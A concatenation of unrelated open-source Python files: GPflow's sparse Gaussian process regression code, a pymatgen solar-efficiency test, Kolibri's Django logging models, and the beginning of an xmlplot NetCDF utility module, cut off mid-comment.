logdet_k = -outdim * (half_logdet_b + 0.5 * log_sigma_sq + 0.5 * trace)
return logdet_k
def quad_term(self, common: "SGPR.CommonTensors") -> tf.Tensor:
"""
:param common: A named tuple containing matrices that will be used
:return: Lower bound on -.5 yᵀ(K + σ²I)⁻¹y
"""
A = common.A
LB = common.LB
x, y = self.data
err = y - self.mean_function(x)
sigma_sq = self.likelihood.variance
sigma = tf.sqrt(sigma_sq)
Aerr = tf.linalg.matmul(A, err)
c = tf.linalg.triangular_solve(LB, Aerr, lower=True) / sigma
# σ⁻² yᵀy
err_inner_prod = tf.reduce_sum(tf.square(err)) / sigma_sq
c_inner_prod = tf.reduce_sum(tf.square(c))
quad = -0.5 * (err_inner_prod - c_inner_prod)
return quad
def elbo(self) -> tf.Tensor:
"""
Construct a tensorflow function to compute the bound on the marginal
likelihood. For a derivation of the terms in here, see the associated
SGPR notebook.
"""
common = self._common_calculation()
output_shape = tf.shape(self.data[-1])
num_data = to_default_float(output_shape[0])
output_dim = to_default_float(output_shape[1])
const = -0.5 * num_data * output_dim * np.log(2 * np.pi)
logdet = self.logdet_term(common)
quad = self.quad_term(common)
return const + logdet + quad
def predict_f(
self, Xnew: InputData, full_cov: bool = False, full_output_cov: bool = False
) -> MeanAndVariance:
        # could be copied into the posterior as a fused version
"""
Compute the mean and variance of the latent function at some new points
Xnew. For a derivation of the terms in here, see the associated SGPR
notebook.
"""
X_data, Y_data = self.data
num_inducing = self.inducing_variable.num_inducing
err = Y_data - self.mean_function(X_data)
kuf = Kuf(self.inducing_variable, self.kernel, X_data)
kuu = Kuu(self.inducing_variable, self.kernel, jitter=default_jitter())
Kus = Kuf(self.inducing_variable, self.kernel, Xnew)
sigma = tf.sqrt(self.likelihood.variance)
L = tf.linalg.cholesky(kuu)
A = tf.linalg.triangular_solve(L, kuf, lower=True) / sigma
B = tf.linalg.matmul(A, A, transpose_b=True) + tf.eye(
num_inducing, dtype=default_float()
) # cache qinv
LB = tf.linalg.cholesky(B)
Aerr = tf.linalg.matmul(A, err)
c = tf.linalg.triangular_solve(LB, Aerr, lower=True) / sigma
tmp1 = tf.linalg.triangular_solve(L, Kus, lower=True)
tmp2 = tf.linalg.triangular_solve(LB, tmp1, lower=True)
mean = tf.linalg.matmul(tmp2, c, transpose_a=True)
if full_cov:
var = (
self.kernel(Xnew)
+ tf.linalg.matmul(tmp2, tmp2, transpose_a=True)
- tf.linalg.matmul(tmp1, tmp1, transpose_a=True)
)
var = tf.tile(var[None, ...], [self.num_latent_gps, 1, 1]) # [P, N, N]
else:
var = (
self.kernel(Xnew, full_cov=False)
+ tf.reduce_sum(tf.square(tmp2), 0)
- tf.reduce_sum(tf.square(tmp1), 0)
)
var = tf.tile(var[:, None], [1, self.num_latent_gps])
return mean + self.mean_function(Xnew), var
def compute_qu(self) -> Tuple[tf.Tensor, tf.Tensor]:
"""
Computes the mean and variance of q(u) = N(mu, cov), the variational distribution on
inducing outputs. SVGP with this q(u) should predict identically to
SGPR.
:return: mu, cov
"""
X_data, Y_data = self.data
kuf = Kuf(self.inducing_variable, self.kernel, X_data)
kuu = Kuu(self.inducing_variable, self.kernel, jitter=default_jitter())
sig = kuu + (self.likelihood.variance ** -1) * tf.matmul(kuf, kuf, transpose_b=True)
sig_sqrt = tf.linalg.cholesky(sig)
sig_sqrt_kuu = tf.linalg.triangular_solve(sig_sqrt, kuu)
cov = tf.linalg.matmul(sig_sqrt_kuu, sig_sqrt_kuu, transpose_a=True)
err = Y_data - self.mean_function(X_data)
mu = (
tf.linalg.matmul(
sig_sqrt_kuu,
tf.linalg.triangular_solve(sig_sqrt, tf.linalg.matmul(kuf, err)),
transpose_a=True,
)
/ self.likelihood.variance
)
return mu, cov
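# Illustrative usage sketch (hypothetical `model`; follows the docstring claim
# that an SVGP initialised from compute_qu matches SGPR predictions):
#
#   >>> import gpflow, tensorflow as tf
#   >>> mu, cov = model.compute_qu()
#   >>> svgp = gpflow.models.SVGP(
#   ...     model.kernel, gpflow.likelihoods.Gaussian(),
#   ...     model.inducing_variable, whiten=False,
#   ...     q_mu=mu, q_sqrt=tf.linalg.cholesky(cov)[None])
#   >>> # svgp.predict_f(Xnew) should now match model.predict_f(Xnew)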
class GPRFITC(SGPRBase_deprecated):
"""
This implements GP regression with the FITC approximation.
The key reference is
::
@inproceedings{Snelson06sparsegaussian,
author = {Edward Snelson and Zoubin Ghahramani},
title = {Sparse Gaussian Processes using Pseudo-inputs},
booktitle = {Advances In Neural Information Processing Systems},
year = {2006},
pages = {1257--1264},
publisher = {MIT press}
}
Implementation loosely based on code from GPML matlab library although
obviously gradients are automatic in GPflow.
"""
def common_terms(
self,
) -> Tuple[tf.Tensor, tf.Tensor, tf.Tensor, tf.Tensor, tf.Tensor, tf.Tensor, tf.Tensor]:
X_data, Y_data = self.data
num_inducing = self.inducing_variable.num_inducing
err = Y_data - self.mean_function(X_data) # size [N, R]
Kdiag = self.kernel(X_data, full_cov=False)
kuf = Kuf(self.inducing_variable, self.kernel, X_data)
kuu = Kuu(self.inducing_variable, self.kernel, jitter=default_jitter())
Luu = tf.linalg.cholesky(kuu) # => Luu Luu^T = kuu
V = tf.linalg.triangular_solve(Luu, kuf) # => V^T V = Qff = kuf^T kuu^-1 kuf
diagQff = tf.reduce_sum(tf.square(V), 0)
nu = Kdiag - diagQff + self.likelihood.variance
B = tf.eye(num_inducing, dtype=default_float()) + tf.linalg.matmul(
V / nu, V, transpose_b=True
)
L = tf.linalg.cholesky(B)
beta = err / tf.expand_dims(nu, 1) # size [N, R]
        alpha = tf.linalg.matmul(V, beta)  # size [M, R]
        gamma = tf.linalg.triangular_solve(L, alpha, lower=True)  # size [M, R]
return err, nu, Luu, L, alpha, beta, gamma
# type-ignore is because of changed method signature:
def maximum_log_likelihood_objective(self) -> tf.Tensor: # type: ignore
return self.fitc_log_marginal_likelihood()
def fitc_log_marginal_likelihood(self) -> tf.Tensor:
"""
Construct a tensorflow function to compute the bound on the marginal
likelihood.
"""
# FITC approximation to the log marginal likelihood is
# log ( normal( y | mean, K_fitc ) )
# where K_fitc = Qff + diag( \nu )
# where Qff = Kfu kuu^{-1} kuf
# with \nu_i = Kff_{i,i} - Qff_{i,i} + \sigma^2
# We need to compute the Mahalanobis term -0.5* err^T K_fitc^{-1} err
# (summed over functions).
# We need to deal with the matrix inverse term.
# K_fitc^{-1} = ( Qff + \diag( \nu ) )^{-1}
# = ( V^T V + \diag( \nu ) )^{-1}
# Applying the Woodbury identity we obtain
# = \diag( \nu^{-1} )
# - \diag( \nu^{-1} ) V^T ( I + V \diag( \nu^{-1} ) V^T )^{-1}
# V \diag(\nu^{-1} )
# Let \beta = \diag( \nu^{-1} ) err
# and let \alpha = V \beta
# then Mahalanobis term = -0.5* (
# \beta^T err - \alpha^T Solve( I + V \diag( \nu^{-1} ) V^T, alpha )
# )
err, nu, _Luu, L, _alpha, _beta, gamma = self.common_terms()
mahalanobisTerm = -0.5 * tf.reduce_sum(
tf.square(err) / tf.expand_dims(nu, 1)
) + 0.5 * tf.reduce_sum(tf.square(gamma))
# We need to compute the log normalizing term -N/2 \log 2 pi - 0.5 \log \det( K_fitc )
# We need to deal with the log determinant term.
# \log \det( K_fitc ) = \log \det( Qff + \diag( \nu ) )
# = \log \det( V^T V + \diag( \nu ) )
# Applying the determinant lemma we obtain
# = \log [ \det \diag( \nu ) \det( I + V \diag( \nu^{-1} ) V^T ) ]
# = \log [
# \det \diag( \nu ) ] + \log [ \det( I + V \diag( \nu^{-1} ) V^T )
# ]
constantTerm = -0.5 * self.num_data * tf.math.log(tf.constant(2.0 * np.pi, default_float()))
logDeterminantTerm = -0.5 * tf.reduce_sum(tf.math.log(nu)) - tf.reduce_sum(
tf.math.log(tf.linalg.diag_part(L))
)
logNormalizingTerm = constantTerm + logDeterminantTerm
return mahalanobisTerm + logNormalizingTerm * self.num_latent_gps
def predict_f(
self, Xnew: InputData, full_cov: bool = False, full_output_cov: bool = False
) -> MeanAndVariance:
"""
Compute the mean and variance of the latent function at some new points
Xnew.
"""
_, _, Luu, L, _, _, gamma = self.common_terms()
Kus = Kuf(self.inducing_variable, self.kernel, Xnew) # [M, N]
w = tf.linalg.triangular_solve(Luu, Kus, lower=True) # [M, N]
tmp = tf.linalg.triangular_solve(tf.transpose(L), gamma, lower=False)
mean = tf.linalg.matmul(w, tmp, transpose_a=True) + self.mean_function(Xnew)
intermediateA = tf.linalg.triangular_solve(L, w, lower=True)
if full_cov:
var = (
self.kernel(Xnew)
- tf.linalg.matmul(w, w, transpose_a=True)
+ tf.linalg.matmul(intermediateA, intermediateA, transpose_a=True)
)
var = tf.tile(var[None, ...], [self.num_latent_gps, 1, 1]) # [P, N, N]
else:
var = (
self.kernel(Xnew, full_cov=False)
- tf.reduce_sum(tf.square(w), 0)
+ tf.reduce_sum(tf.square(intermediateA), 0)
) # [N, P]
var = tf.tile(var[:, None], [1, self.num_latent_gps])
return mean, var
class SGPR_with_posterior(SGPR_deprecated):
"""
    This is an implementation of SGPR that provides a posterior() method that
enables caching for faster subsequent predictions.
"""
def posterior(
self,
precompute_cache: posteriors.PrecomputeCacheType = posteriors.PrecomputeCacheType.TENSOR,
) -> posteriors.SGPRPosterior:
"""
Create the Posterior object which contains precomputed matrices for
faster prediction.
precompute_cache has three settings:
- `PrecomputeCacheType.TENSOR` (or `"tensor"`): Precomputes the cached
quantities and stores them as tensors (which allows differentiating
through the prediction). This is the default.
- `PrecomputeCacheType.VARIABLE` (or `"variable"`): Precomputes the cached
quantities and stores them as variables, which allows for updating
their values without changing the compute graph (relevant for AOT
compilation).
- `PrecomputeCacheType.NOCACHE` (or `"nocache"` or `None`): Avoids
immediate cache computation. This is useful for avoiding extraneous
computations when you only want to call the posterior's
`fused_predict_f` method.
"""
return posteriors.SGPRPosterior(
kernel=self.kernel,
data=self.data,
inducing_variable=self.inducing_variable,
likelihood_variance=self.likelihood.variance,
num_latent_gps=self.num_latent_gps,
mean_function=self.mean_function,
precompute_cache=precompute_cache,
)
def predict_f(
self, Xnew: InputData, full_cov: bool = False, full_output_cov: bool = False
) -> MeanAndVariance:
"""
        For backwards compatibility, SGPR's predict_f uses the fused (no-cache)
computation, which is more efficient during training.
For faster (cached) prediction, predict directly from the posterior object, i.e.,:
model.posterior().predict_f(Xnew, ...)
"""
return self.posterior(posteriors.PrecomputeCacheType.NOCACHE).fused_predict_f(
Xnew, full_cov=full_cov, full_output_cov=full_output_cov
)
class SGPR(SGPR_with_posterior):
# subclassed to ensure __class__ == "SGPR"
pass
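# Illustrative end-to-end sketch (hypothetical data, kernel and optimiser
# settings): fitting the SGPR model defined above and predicting from the
# cached posterior.
#
#   >>> import numpy as np, gpflow
#   >>> X = np.random.rand(100, 1)
#   >>> Y = np.sin(6 * X) + 0.1 * np.random.randn(100, 1)
#   >>> model = gpflow.models.SGPR((X, Y), gpflow.kernels.SquaredExponential(),
#   ...                            inducing_variable=X[:20].copy())
#   >>> opt = gpflow.optimizers.Scipy()
#   >>> _ = opt.minimize(model.training_loss, model.trainable_variables)
#   >>> mean, var = model.posterior().predict_f(X[:5])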
| GPflow/GPflow | gpflow/models/sgpr.py | Python | apache-2.0 | 20,495 | ["Gaussian"] | 645221fbaa798179413ab447bc8ee9c82e7c805653c83dbbe87e97c888bef0f4 |
import os
import unittest
import warnings
from pymatgen.analysis.solar.slme import optics, slme
from pymatgen.util.testing import PymatgenTest
class SolarTest(PymatgenTest):
_multiprocess_shared_ = True
def setUp(self):
warnings.simplefilter("ignore")
def tearDown(self):
warnings.simplefilter("default")
def test_slme_from_vasprun(self):
path = os.path.join(os.path.dirname(__file__), "vasprun.xml")
en, abz, dirgap, indirgap = optics(path)
abz = abz * 100.0
eff = slme(en, abz, indirgap, indirgap, plot_current_voltage=False)
self.assertAlmostEqual(eff, 27.728998512472298, places=5)
if __name__ == "__main__":
unittest.main()
| vorwerkc/pymatgen | pymatgen/analysis/solar/tests/test_slme.py | Python | mit | 713 | ["pymatgen"] | 1f0124a7518986bfcc8c190b67671114a8d16de2b67ab3b2a5e75844bec21ae4 |
"""
This app is intended to provide the core functionality for tracking user
engagement with content and Kolibri in general. As such, it is intended
to store details of user interactions with content, a summary of those
interactions, interactions with the software in general, as well as user
feedback on the content and the software.
"""
from __future__ import unicode_literals
from datetime import timedelta
from django.core.exceptions import ObjectDoesNotExist
from django.core.exceptions import ValidationError
from django.core.validators import MaxValueValidator
from django.core.validators import MinValueValidator
from django.db import models
from django.utils import timezone
from jsonfield import JSONField
from morango.query import SyncableModelQuerySet
from .permissions import AnyoneCanWriteAnonymousLogs
from kolibri.core.auth.constants import role_kinds
from kolibri.core.auth.models import AbstractFacilityDataModel
from kolibri.core.auth.models import Facility
from kolibri.core.auth.models import FacilityUser
from kolibri.core.auth.permissions.base import RoleBasedPermissions
from kolibri.core.auth.permissions.general import IsOwn
from kolibri.core.content.models import UUIDField
from kolibri.core.exams.models import Exam
from kolibri.core.fields import DateTimeTzField
from kolibri.utils.time import local_now
class BaseLogQuerySet(SyncableModelQuerySet):
def filter_by_topic(self, topic, content_id_lookup="content_id"):
"""
Filter a set of logs by content_id, using content_ids from all descendants of specified topic.
"""
content_ids = topic.get_descendant_content_ids()
        return self.filter_by_content_ids(content_ids, content_id_lookup=content_id_lookup)
def filter_by_content_ids(self, content_ids, content_id_lookup="content_id"):
"""
Filter a set of logs by content_id, using content_ids from the provided list or queryset.
"""
return self.filter(**{content_id_lookup + "__in": content_ids})
def log_permissions(user_field):
return (
AnyoneCanWriteAnonymousLogs(field_name=user_field + '_id') |
IsOwn(field_name=user_field + '_id') |
RoleBasedPermissions(
target_field=user_field,
can_be_created_by=(role_kinds.ADMIN,),
can_be_read_by=(role_kinds.ADMIN, role_kinds.COACH),
can_be_updated_by=(role_kinds.ADMIN,),
can_be_deleted_by=(role_kinds.ADMIN,),
)
)
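# Note: log_permissions composes three permission classes with "|" (access is
# granted if any one of them allows it): anonymous writers via
# AnyoneCanWriteAnonymousLogs, the owning user via IsOwn, and facility
# admins/coaches via RoleBasedPermissions as configured above.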
class BaseLogModel(AbstractFacilityDataModel):
permissions = log_permissions("user")
class Meta:
abstract = True
def infer_dataset(self, *args, **kwargs):
if self.user:
return self.user.dataset
elif self.dataset_id:
# confirm that there exists a facility with that dataset_id
try:
return Facility.objects.get(dataset_id=self.dataset_id).dataset
except Facility.DoesNotExist:
pass
# if no user or matching facility, infer dataset from the default facility
facility = Facility.get_default_facility()
assert facility, "Before you can save logs, you must have a facility"
return facility.dataset
objects = BaseLogQuerySet.as_manager()
def calculate_partition(self):
if self.user_id:
return '{dataset_id}:user-rw:{user_id}'.format(dataset_id=self.dataset_id, user_id=self.user_id)
else:
return '{dataset_id}:anonymous'.format(dataset_id=self.dataset_id)
class ContentSessionLog(BaseLogModel):
"""
This model provides a record of interactions with a content item within a single visit to that content page.
"""
# Morango syncing settings
morango_model_name = "contentsessionlog"
user = models.ForeignKey(FacilityUser, blank=True, null=True)
content_id = UUIDField(db_index=True)
channel_id = UUIDField()
start_timestamp = DateTimeTzField()
end_timestamp = DateTimeTzField(blank=True, null=True)
time_spent = models.FloatField(help_text="(in seconds)", default=0.0, validators=[MinValueValidator(0)])
progress = models.FloatField(default=0, validators=[MinValueValidator(0)])
kind = models.CharField(max_length=200)
extra_fields = JSONField(default={}, blank=True)
def save(self, *args, **kwargs):
if self.progress < 0:
raise ValidationError("Progress out of range (<0)")
super(ContentSessionLog, self).save(*args, **kwargs)
class ContentSummaryLog(BaseLogModel):
"""
This model provides a summary of all interactions a user has had with a content item.
"""
# Morango syncing settings
morango_model_name = "contentsummarylog"
user = models.ForeignKey(FacilityUser)
content_id = UUIDField(db_index=True)
channel_id = UUIDField()
start_timestamp = DateTimeTzField()
end_timestamp = DateTimeTzField(blank=True, null=True)
completion_timestamp = DateTimeTzField(blank=True, null=True)
time_spent = models.FloatField(help_text="(in seconds)", default=0.0, validators=[MinValueValidator(0)])
progress = models.FloatField(default=0, validators=[MinValueValidator(0), MaxValueValidator(1.01)])
kind = models.CharField(max_length=200)
extra_fields = JSONField(default={}, blank=True)
def calculate_source_id(self):
return self.content_id
def save(self, *args, **kwargs):
if self.progress < 0 or self.progress > 1.01:
raise ValidationError("Content summary progress out of range (0-1)")
super(ContentSummaryLog, self).save(*args, **kwargs)
class UserSessionLog(BaseLogModel):
"""
This model provides a record of a user session in Kolibri.
"""
# Morango syncing settings
morango_model_name = "usersessionlog"
user = models.ForeignKey(FacilityUser)
channels = models.TextField(blank=True)
start_timestamp = DateTimeTzField(default=local_now)
last_interaction_timestamp = DateTimeTzField(null=True, blank=True)
pages = models.TextField(blank=True)
@classmethod
def update_log(cls, user):
"""
Update the current UserSessionLog for a particular user.
"""
if user and isinstance(user, FacilityUser):
try:
user_session_log = cls.objects.filter(user=user).latest('last_interaction_timestamp')
except ObjectDoesNotExist:
user_session_log = None
if not user_session_log or timezone.now() - user_session_log.last_interaction_timestamp > timedelta(minutes=5):
user_session_log = cls(user=user)
user_session_log.last_interaction_timestamp = local_now()
user_session_log.save()
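    # Illustrative usage sketch (hypothetical `request` object): update_log is
    # meant to be called on user activity; a new session row is created when
    # the last interaction is more than five minutes old.
    #
    #   >>> UserSessionLog.update_log(request.user)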
class MasteryLog(BaseLogModel):
"""
This model provides a summary of a user's engagement with an assessment within a mastery level
"""
# Morango syncing settings
morango_model_name = "masterylog"
user = models.ForeignKey(FacilityUser)
# Every MasteryLog is related to the single summary log for the user/content pair
summarylog = models.ForeignKey(ContentSummaryLog, related_name="masterylogs")
# The MasteryLog records the mastery criterion that has been specified for the user.
# It is recorded here to prevent this changing in the middle of a user's engagement
# with an assessment.
mastery_criterion = JSONField(default={})
start_timestamp = DateTimeTzField()
end_timestamp = DateTimeTzField(blank=True, null=True)
completion_timestamp = DateTimeTzField(blank=True, null=True)
# The integer mastery level that this log is tracking.
mastery_level = models.IntegerField(validators=[MinValueValidator(1), MaxValueValidator(10)])
# Has this mastery level been completed?
complete = models.BooleanField(default=False)
def infer_dataset(self, *args, **kwargs):
return self.user.dataset
def calculate_source_id(self):
return "{summarylog_id}:{mastery_level}".format(summarylog_id=self.summarylog_id, mastery_level=self.mastery_level)
class BaseAttemptLog(BaseLogModel):
"""
This is an abstract model that provides a summary of a user's engagement within a particular
interaction with an item/question in an assessment
"""
# Unique identifier within the relevant assessment for the particular question/item
# that this attemptlog is a record of an interaction with.
item = models.CharField(max_length=200)
start_timestamp = DateTimeTzField()
end_timestamp = DateTimeTzField()
completion_timestamp = DateTimeTzField(blank=True, null=True)
time_spent = models.FloatField(help_text="(in seconds)", default=0.0, validators=[MinValueValidator(0)])
complete = models.BooleanField(default=False)
# How correct was their answer? In simple cases, just 0 or 1.
correct = models.FloatField(validators=[MinValueValidator(0), MaxValueValidator(1)])
hinted = models.BooleanField(default=False)
# JSON blob that would allow the learner's answer to be rerendered in the frontend interface
answer = JSONField(default={}, null=True, blank=True)
# A human readable answer that could be rendered directly in coach reports, can be blank.
simple_answer = models.CharField(max_length=200, blank=True)
# A JSON Array with a sequence of JSON objects that describe the history of interaction of the user
# with this assessment item in this attempt.
interaction_history = JSONField(default=[], blank=True)
user = models.ForeignKey(FacilityUser, blank=True, null=True)
error = models.BooleanField(default=False)
class Meta:
abstract = True
class AttemptLog(BaseAttemptLog):
"""
This model provides a summary of a user's engagement within a particular interaction with an
item/question in an assessment
"""
morango_model_name = 'attemptlog'
# Which mastery log was this attemptlog associated with?
masterylog = models.ForeignKey(MasteryLog, related_name="attemptlogs", blank=True, null=True)
sessionlog = models.ForeignKey(ContentSessionLog, related_name="attemptlogs")
def infer_dataset(self, *args, **kwargs):
return self.sessionlog.dataset
class ExamLog(BaseLogModel):
"""
This model provides a summary of a user's interaction with a particular exam, and serves as
an aggregation point for individual attempts on that exam.
"""
morango_model_name = 'examlog'
# Identifies the exam that this is for.
exam = models.ForeignKey(Exam, related_name="examlogs", blank=False, null=False)
# Identifies which user this log summarizes interactions for.
user = models.ForeignKey(FacilityUser)
# Is this exam open for engagement, or is it closed?
# Used to end user engagement with an exam when it has been deactivated.
closed = models.BooleanField(default=False)
# when was this exam finished?
completion_timestamp = DateTimeTzField(blank=True, null=True)
def calculate_source_id(self):
return "{exam_id}:{user_id}".format(exam_id=self.exam_id, user_id=self.user_id)
def calculate_partition(self):
return self.dataset_id
class ExamAttemptLog(BaseAttemptLog):
"""
This model provides a summary of a user's engagement within a particular interaction with an
item/question in an exam
"""
morango_model_name = 'examattemptlog'
examlog = models.ForeignKey(ExamLog, related_name="attemptlogs", blank=False, null=False)
# We have no session logs associated with ExamLogs, so we need to record the channel and content
# ids here
content_id = UUIDField()
channel_id = UUIDField()
def infer_dataset(self, *args, **kwargs):
return self.examlog.dataset
def calculate_partition(self):
return self.dataset_id
| DXCanas/kolibri | kolibri/core/logger/models.py | Python | mit | 11,759 | ["VisIt"] | ae85f38e33102bf30f632ce2992a05cc3b80daa82174f772aa65569fbe156683 |
# Import modules from standard Python library
import os, sys, re, datetime, shutil, types, UserDict, glob
# Import additional third party modules
import numpy
# Import our custom modules
import xmlplot.common, xmlstore.util
def openNetCDF(path,mode='r'):
# Test if the path contains wildcard, and resolves to multiple files.
# If so, we will try to combine these files.
if isinstance(path,basestring):
paths = glob.glob(path)
if len(paths)==1:
path = paths[0]
elif len(paths)>1:
path = paths
if isinstance(path,basestring):
return getNetCDFFile(path,mode)
else:
assert mode=='r','A multi-file NetCDF dataset can only be opened for reading.'
return MultiNetCDFFile(*path)
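# Illustrative usage sketch (hypothetical file names): opening a single file
# or a wildcard pattern that resolves to a multi-file dataset.
#
#   >>> nc = openNetCDF('results.nc')
#   >>> multi = openNetCDF('results_*.nc')  # read-only MultiNetCDFFile
#   >>> print nc.variables.keys()  # Scientific.IO.NetCDF-style interface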
netcdfmodules,selectednetcdfmodule = None,None
def chooseNetCDFModule(forcedmodule=None):
if forcedmodule is None:
# Select default NetCDF module.
enumerateNetCDFModules()
else:
# Find user-specified NetCDF module.
global selectednetcdfmodule
if netcdfmodules is None: enumerateNetCDFModules()
for selectednetcdfmodule,(m,v) in enumerate(netcdfmodules):
if m==forcedmodule: break
else:
raise Exception('Forced NetCDF module "%s" is not available. Available modules: %s.' % (forcedmodule,', '.join([m[0] for m in netcdfmodules])))
def enumerateNetCDFModules():
global netcdfmodules,selectednetcdfmodule
global pupynere,Scientific,netCDF4,pynetcdf
netcdfmodules = []
selectednetcdfmodule = -1
error = ''
# Try to locate netCDF4.
ready = True
try:
import netCDF4
except ImportError,e:
error += 'Cannot load netCDF4. Reason: %s.\n' % str(e)
ready = False
if ready:
if selectednetcdfmodule==-1: selectednetcdfmodule = len(netcdfmodules)
netcdfmodules.append(('netCDF4',netCDF4.__version__))
# Try to locate ScientificPython.
# Note that this is best done after trying netCDF4, because ScientificPython's version of the NetCDF library is generally lower (3.x).
# If ScientificPython is loaded first, netCDF4 is unable to load the required >=4 version of the NetCDF library.
# If ScientificPython is loaded after netCDF4, it will use the NetCDF library loaded by netCDF4, if both these modules are present.
ready = True
try:
import Scientific.IO.NetCDF
except ImportError,e:
error += 'Cannot load Scientific.IO.NetCDF. Reason: %s.\n' % str(e)
ready = False
if ready:
oldscientific = False
try:
version = map(int,Scientific.__version__.split('.')[:2])
oldscientific = version[0]<2 or (version[0]==2 and version[1]<7)
except: pass
if not oldscientific and selectednetcdfmodule==-1: selectednetcdfmodule = len(netcdfmodules)
netcdfmodules.append(('Scientific.IO.NetCDF',Scientific.__version__))
# Try to locate pynetcdf.
ready = True
try:
import pynetcdf
except ImportError,e:
error += 'Cannot load pynetcdf. Reason: %s.\n' % str(e)
ready = False
if ready:
if selectednetcdfmodule==-1:
pyver = sys.version_info
if (pyver[0]==2 and pyver[1]>=5) or pyver[0]>2:
print 'pynetcdf will be used for NetCDF support. Note though that pynetcdf has known incompatibilities with Python 2.5 and higher, and you are using Python %i.%i.%i.' % (pyver[0],pyver[1],pyver[2])
selectednetcdfmodule = len(netcdfmodules)
netcdfmodules.append(('pynetcdf',''))
# Try to locate PuPyNeRe, though that does not work for all NetCDF files (e.g., GOTM!).
ready = True
try:
import pupynere
except ImportError,e:
error += 'Cannot load pupynere. Reason: %s.\n' % str(e)
ready = False
if ready:
if selectednetcdfmodule==-1: selectednetcdfmodule = len(netcdfmodules)
netcdfmodules.append(('pupynere','unknown'))
if selectednetcdfmodule==-1 and netcdfmodules: selectednetcdfmodule = 0
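# Backend selection sketch: chooseNetCDFModule picks the default backend (preferring
# netCDF4, per the enumeration order above), or a specific backend can be forced by
# name; the names match those appended to netcdfmodules:
#
#   chooseNetCDFModule()                         # auto-select the default backend
#   chooseNetCDFModule('Scientific.IO.NetCDF')   # force ScientificPython, if present
#   print netcdfmodules[selectednetcdfmodule]    # (name, version) of the active backend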
class NetCDFError(Exception): pass
def getNetCDFFile(path,mode='r'):
"""Returns a NetCDFFile file object representing the NetCDF file
at the specified path. The returned object follows
Scientific.IO.NetCDFFile conventions.
Note: this is the *only* function that needs to know which NetCDF
module to use. All other functions just operate on an object
returned by this function, and expect this object to follow
Scientific.IO.NetCDFFile conventions. Thus adding/replacing a module
for NetCDF support should only require a change in this function.
"""
if selectednetcdfmodule is None: chooseNetCDFModule()
# First import NetCDF file format support (we do this here rather
# than on import, because this module can be useful without NetCDF
# support as well).
netcdfmodule = None
if netcdfmodules: netcdfmodule = netcdfmodules[selectednetcdfmodule][0]
# Check whether the file exists at all.
if mode=='r' and netcdfmodule!='netCDF4' and not os.path.isfile(path):
raise NetCDFError('"%s" is not an existing file.' % path)
if netcdfmodule=='Scientific.IO.NetCDF':
try:
nc = Scientific.IO.NetCDF.NetCDFFile(path,mode=mode)
except Exception, e:
raise NetCDFError('An error occurred while opening the NetCDF file "%s": %s' % (path,str(e)))
elif netcdfmodule=='netCDF4':
try:
nc = netCDF4.Dataset(path,mode=mode,format='NETCDF3_CLASSIC')
except Exception, e:
raise NetCDFError('An error occurred while opening the NetCDF file "%s": %s' % (path,str(e)))
elif netcdfmodule=='pupynere':
try:
nc = pupynere.NetCDFFile(path,mode=mode,mmap=False)
except Exception, e:
raise NetCDFError('An error occurred while opening the NetCDF file "%s": %s' % (path,str(e)))
elif netcdfmodule=='pynetcdf':
try:
nc = pynetcdf.NetCDFFile(path,mode=mode)
except Exception, e:
raise NetCDFError('An error occurred while opening the NetCDF file "%s": %s' % (path,str(e)))
else:
# No NetCDF module found - raise exception.
raise NetCDFError('Cannot load a module for NetCDF reading. Please install either ScientificPython, python-netcdf4 or pynetcdf.')
return nc
class ReferenceTimeParseError(Exception): pass
reNcDate,reNcTime,reNcTimeZone = None,None,None
def parseNcTimeUnit(fullunit):
"""Parses a udunits/COARDS units string to extract the reference time and time unit.
Raises an exception if the string does not match udunits/COARDS convention.
Returns the time unit (in days), and the reference date+time used.
Supposedly the udunits package could do this, but so far I have not found a minimal
udunits module for Python.
"""
# Retrieve time unit (in days) and reference date/time, based on COARDS convention.
if ' since ' not in fullunit:
raise ReferenceTimeParseError('"units" attribute equals "%s", which does not follow COARDS convention. Problem: string does not contain " since ".' % fullunit)
timeunit,reftime = fullunit.split(' since ')
global reNcDate,reNcTime,reNcTimeZone
if reNcDate is None:
reNcDate = re.compile(r'(\d\d\d\d)[-\/](\d{1,2})-(\d{1,2})\s*')
reNcTime = re.compile(r'(\d{1,2}):(\d{1,2}):(\d{1,2}(?:\.\d*)?)\s*')
reNcTimeZone = re.compile(r'(-?\d{1,2})(?::?(\d\d))?$')
# Parse the reference date, time and timezone
datematch = reNcDate.match(reftime)
if datematch is None:
raise ReferenceTimeParseError('"units" attribute equals "%s", which does not follow COARDS convention. Problem: cannot parse date in "%s".' % (fullunit,reftime))
year,month,day = map(int,datematch.group(1,2,3))
year = max(year,1900) # datetime year>=datetime.MINYEAR, but strftime needs year>=1900
hours,minutes,seconds,mseconds = 0,0,0,0
reftime = reftime[datematch.end():]
if len(reftime)>0:
timematch = reNcTime.match(reftime)
if timematch is None:
raise ReferenceTimeParseError('"units" attribute equals "%s", which does not follow COARDS convention. Problem: cannot parse time in "%s".' % (fullunit,reftime))
hours,minutes = map(int,timematch.group(1,2))
seconds = float(timematch.group(3))
mseconds = 1e6*(seconds % 1.)
seconds = int(seconds)
reftime = reftime[timematch.end():]
dateref = datetime.datetime(year,month,day,hours,minutes,seconds,tzinfo=xmlstore.util.getUTC())
if len(reftime)>0:
timezonematch = reNcTimeZone.match(reftime)
if timezonematch is None:
raise ReferenceTimeParseError('"units" attribute equals "%s", which does not follow COARDS convention. Problem: cannot parse time zone in "%s".' % (fullunit,reftime))
if timezonematch.group(2) is None:
dhour,dmin = int(timezonematch.group(1)),0
else:
dhour,dmin = map(int,timezonematch.group(1,2))
if dhour<0: dmin = -dmin
dateref -= datetime.timedelta(hours=dhour,minutes=dmin)
# Get time unit in number of days.
timeunit = timeunit.lower()
if timeunit in ('seconds','second','secs','sec','ss','s'):
timeunit = 1./86400.
elif timeunit in ('minutes','minute','mins','min'):
timeunit = 1./1440.
elif timeunit in ('hours','hour','hrs','hr','hs','h'):
timeunit = 1./24.
elif timeunit in ('days','day','ds','d'):
timeunit = 1.
elif timeunit in ('months','month'):
timeunit = 365.242198781/12. # udunits convention: month=year/12=365.242198781/12 days
elif timeunit in ('years','year','yrs','yr','ys','y'):
timeunit = 365.242198781 # udunits convention: year=365.242198781 days
else:
raise ReferenceTimeParseError('"units" attribute equals "%s", which does not follow COARDS convention. Problem: unknown time unit "%s".' % (fullunit,timeunit))
return timeunit,dateref
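# Examples of parseNcTimeUnit on COARDS-style "units" strings (values follow from
# the parsing above; the reference date is returned as a UTC datetime):
#
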